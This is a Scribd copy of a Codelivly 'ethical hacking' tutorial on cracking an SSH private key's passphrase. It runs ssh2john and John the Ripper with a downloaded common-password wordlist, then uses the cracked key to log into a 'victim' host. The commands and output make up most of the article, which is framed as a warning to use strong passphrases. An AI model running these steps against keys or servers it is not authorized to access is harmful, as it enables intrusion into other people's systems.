Scribd
Upload
149 views8 pages

Crack SSH Private Key With John The Ripper - Codelivly

Uploaded by

enzobouraima
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
149 views8 pages

Crack SSH Private Key With John The Ripper - Codelivly

Uploaded by

enzobouraima
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Codelivly  

Home » Ethical hacking » Crack SSH Private Key with John the Ripper

ETHICAL HACKING

Crack SSH Private Key with John the


Ripper
By Rocky ◆ February 20, 2023  No Comments  4 Mins Read

 Share     

The SSH private key code should not be just a decoration. Unfortunately, some people think
they will never lose their SSH private key and neglect to use a strong password.
In the guide 10 simple steps for a secure SSH we saw the SSH (from Secure Shell) protocol
which is used for secure (encrypted) connections with remote computers / servers. It is used
not only to execute commands in the server’s terminal but also to transfer files to and from
the server (e.g. with FileZilla to transfer files to the Server) or even to transfer audio via ssh.
So you understand from the above its “power” and how important it is to have a secure ssh.
Unfortunately, some do not realize the seriousness of the issue and sufferers of the “will it
happen to me?” syndrome. Servers become the pawns of the FritzFrog Botnet |Attacks on
SSH servers by a sophisticated peer-to-peer (P2P) botnet that compromises SSH servers.
As for the SSH code and what a strong password is, you don’t need to be educated, three or
four simple words joined by punctuation marks is a good and secure model for passwords
and passwords.

source: https://xkcd.com/936/
Just make sure you remember the password. So in the following scenario, we’ll see what
happens if you haven’t dealt with it in the first 10 minutes on a new Server with Basic security
settings, or you managed to lose your SSH private key to which you had put an easy code.

Install SSH2John on your computer


SSH2John is If you do not have the Jumbo version of John the Ripper installed, you will need
to download ssh2john from GitHub, as it is not included on Kali Linux. If you don’t have John
the Ripper installed, you can learn how to install it from his GitHub.
We open a terminal and download it:

~# wget
https://raw.githubusercontent.com/magnumripper/JohnTh
eRipper/bleeding-jumbo/run/ssh2john.py
--2020-09-01 12:26:03--
https://raw.githubusercontent.com/magnumripper/JohnTh
eRipper/bleeding-jumbo/run/ssh2john.py
HTTP request sent, waiting for response... 200 OK
Length: 7825 (7.6K) [text/plain]
Saving to: 'ssh2john.py'
ssh2john.py 100%[=======================>] 7.64K --.-
KB/s in 0s

Now let’s crack the SSH private Key.

Crack the private key


All we need to do is run the ssh2john tool against the private key and redirect the results to a
new hash file using:

python ssh2john.py id_rsa > id_rsa.hash

Next, we’ll use it John the ripper to crack the password. But first, we need a proper word list.
For the purposes of this guide, we will use a small one that has 100 words to show how to do
it in a simple way. Download it:
~# wget
https://raw.githubusercontent.com/danielmiessler/SecL
ists/master/Passwords/darkweb2017-top100.txt

Now run John on Kali Linux as usual, feeding it the wordlist and hash file:
john –wordlist=darkweb2017-top100.txt id_rsa.hash

Note: This format may emit false positives, so it


will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key
for status
1q2w3e4r5t (id_rsa)
Session completed

We can see that it recognized our password, but to be sure, let’s use the command –show to
verify it:

john --show id_rsa.hash


id_rsa:1q2w3e4r5t
1 password hash cracked, 0 lef

As you can see, even 1q2w3e4r5t what to the common eye may seem hard to crack…
unfortunately for you who use it…is a matter of vocabulary.

SSH access to the victim


With the key broken, all that remains is to use it against the target for which the particular key
is being used. Using the option -i in the SSH command, we can specify the private key to use
for authentication:
ssh -i id_rsa [email protected]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT
accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
[email protected]'s password

It won’t let us use the key if the permissions are too … loose. So all we have to do is set some
stricter permissions to use the private key:

chmod 400 id_rsa

Now we are able to connect. Then, we enter the password that we


have cracked, and the message shows that we are connected:

~# ssh -i id_rsa [email protected]


Enter passphrase for key 'id_rsa':
Last login: Tue Sep 1 15:20:16 2020 from 10.10.10.1
luser@target:~$

Final Thoughts
In this short guide, we have seen how one can crack SSH passwords.
In most cases these are done massively and automatically and SSH keys are broken like
lettuce leaves if we do not pay attention to the overall security of our system, and we have
the illusion that since we have a Linux Server we are safe. As you may have read in Enough
with the FUD about Linux security holes, you will understand that security is not an end
product but an ongoing process.
     

 PREVIOUS ARTICLE NEXT ARTICLE 

Unusual 403 Bypass to a full website Writing a SSH brute forcer using python
takeover [External Pentest]

Rocky     

Rocky is a versatile author sharing in-depth tutorials on web development, AI, and ethical
hacking. Unlock new possibilities and expand your knowledge with Rocky's empowering
content.

Related Posts

CYBER SECURITY ETHICAL HACKING

So You Want to Be a Hacker: 2024 Edition Multiple Ways To Exploiting HTTP


May 8, 2024 Authentication
March 30, 2024
ETHICAL HACKING

Bypassing Two-Factor Authentication


March 30, 2024

ADD A COMMENT

Search … SEARCH

Support Us

ABOUT US

This is the Codelivly blog. Here, you will find articles discussing various topics related to coding
and programming. Our goal is to provide helpful resources and advice for beginners and
experienced coders alike.

RECENT POSTS

So You Want to Be a Hacker: 2024 Edition


What is Active Directory? A Beginner’s Guide
Mastering Networking Fundamentals: A Comprehensive Guide for Hackers
Multiple Ways To Exploiting HTTP Authentication
Bypassing Two-Factor Authentication

IMPORTANT PAGE

About Us
Advertise With Us
Contact US
Privacy Policy
Refund Policy
Write For Us

     

© 2024 Codelivly. All Right Reserved

You might also like